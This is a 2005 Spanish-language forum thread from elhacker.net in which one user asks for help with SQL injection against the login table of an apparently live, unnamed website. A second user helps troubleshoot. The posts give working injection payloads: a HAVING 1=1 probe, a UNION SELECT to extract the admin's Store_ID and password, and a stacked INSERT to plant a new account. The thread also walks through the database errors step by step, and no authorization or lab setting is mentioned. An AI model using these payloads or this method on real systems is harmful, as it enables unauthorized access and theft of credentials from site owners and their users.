elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  SQL Injeccion- Pregunta
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SQL Injeccion- Pregunta  (Leído 3,560 veces)
VCore

Desconectado Desconectado

Mensajes: 71



Ver Perfil
SQL Injeccion- Pregunta
« en: 25 Junio 2005, 18:19 »

Hola yo tengo las siguientes tablas

' GROUP BY Login.Store_ID, Login.Password HAVING 1=1--

y eh intentado dos cosas primero

Código:
' UNION SELECT MIN(Store_ID),1,1 FROM Login WHERE Store_ID > 'a'--
Para sacar el usuario admin y luego con otra sentencia su password, pero no ha funcionado.

Y luego lo que se me ocurrio fue agregar un usuario a la tabla

Código:
'; insert into Login values ('vcore', 'pass', 0xffff)--

pero me da el siguiente error

Incorrect syntax near '; insert into Login values ('.
En línea

jujaLVP

Desconectado Desconectado

Mensajes: 211


llega la batalla y contra el estalla ...


Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #1 en: 25 Junio 2005, 18:54 »

hola!

primero:en que campo haces la injecccion, Login.password¿?
segundo:antes de hacer esto:
Citar
' UNION SELECT MIN(Store_ID),1,1 FROM Login WHERE Store_ID > 'a'--

deberias saber los campos del query original,

y aca

Citar
'; insert into Login values ('vcore', 'pass', 0xffff)--

creo que te da el error por las comillas,como hay varias quizas el motor de base de datos lo interpreta mal.

saca los datos que te faltan y te dot una mano.


saludos
En línea

VCore

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #2 en: 25 Junio 2005, 21:02 »

mira por lo que yo vi y entiendo el nombre de la tabla se llama LOGIN ,que la saque con ' Having 1=1-- 
y campos solo tiene dos Store_ID y Password

y luegon probando

Código:
' UNION SELECT SUM(Store_ID) FROM Login--

me dio como resultado:

Código:
The sum or average aggregate operation cannot take a varchar data type as an argument.

Y despues lo hice con el otro asique sino me equivoco varchar significaba que podian ser numeros o letras

EDIT:
El error que me da al tratar de agregar un usuario es :
Código:
Insert Error: Column name or number of supplied values does not match table definition.

RE-EDIT :P : cuando puse '; insert into Login values (vcore, pass, 0xffff)--

(osea lo mismo pero sin comillas)
dio como resultado:
Código:
The name 'vcore' is not permitted in this context. Only constants, expressions, or variables allowed here. Column names are not permitted.
« Última modificación: 25 Junio 2005, 21:12 por VCore » En línea

jujaLVP

Desconectado Desconectado

Mensajes: 211


llega la batalla y contra el estalla ...


Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #3 en: 28 Junio 2005, 01:44 »

veamos..
Citar
' UNION SELECT SUM(Store_ID) FROM Login--

me dio como resultado:

Código:
The sum or average aggregate operation cannot take a varchar data type as an argument.
gracias a ese error te das cuenta que el campo "Store_ID" es de tipo "varchar" o sea cadena de caracteres mas comunmente llamada "string" y que aunque un string pueda contener numeros no se pueden utilizar en funciones como el "SUM" que admiten enteros como argumento.


Citar
El error que me da al tratar de agregar un usuario es :
Código:
Insert Error: Column name or number of supplied values does not match table definition.
es probable que te de este error se deba a que no estas insertando valores en todos los campos que posee la tabla,pero no estoy muy seguro al respecto.


Citar
cuando puse '; insert into Login values (vcore, pass, 0xffff)--

(osea lo mismo pero sin comillas)
dio como resultado:
Código:
The name 'vcore' is not permitted in this context. Only constants, expressions, or variables allowed here. Column names are not permitted.
cuando pones algo sin comillas que no sean numeros,se interpreta como una variable o como el nombre de un campo, y como no se pueden poner nombres de campos dentro del "VALUES" del "INSERT" te tira este error.

me quedo una duda, de el tercer campo de la tabla "Login" en el cual pusiste 0xffff, esta en el query original?
si esta y no es de tipo varhcar te puede ser muy util...

saludos.
En línea

VCore

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #4 en: 28 Junio 2005, 02:19 »

no le hagas caso a eso de 0xffff la verdad que no se porque lo puse  ???

Me podrias aclarar lo del query porque lo unico que se es que query es una consulta
En línea

jujaLVP

Desconectado Desconectado

Mensajes: 211


llega la batalla y contra el estalla ...


Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #5 en: 28 Junio 2005, 03:37 »

leete esto:
Tecnicas de SQL injection:Un repaso

de Hernan Racciatti
http://www.hernanracciatti.com.ar

a mi me sirvio de mucho

saludos
En línea

VCore

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: SQL Injeccion- Pregunta
« Respuesta #6 en: 29 Junio 2005, 01:39 »

estoy bajando el pdf a ver que tal
una cosilla antes creo que me eh podido crear un usuario no estoy seguro ya que cuando lo creo no manda ningun error de sql y cuando me logueo me responde

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

Bue me voy a leer :D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ASP.net + Injeccion SQL
.NET (C#, VB.NET, ASP)
acid0ikario 6 3,359 Último mensaje 20 Febrero 2011, 16:44
por acid0ikario
Duda con SQL injección
Nivel Web
.:UND3R:. 0 2,217 Último mensaje 18 Abril 2011, 19:18
por .:UND3R:.
Duda con SQL injección
Nivel Web
.:UND3R:. 8 3,153 Último mensaje 19 Abril 2011, 19:44
por Edu
vulnerable a injeccion remota SQL
Nivel Web
ruben_linux 0 1,191 Último mensaje 31 Agosto 2011, 23:33
por ruben_linux
problema injeccion SQL
Dudas Generales
umadbro 0 938 Último mensaje 11 Noviembre 2011, 03:42
por umadbro
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines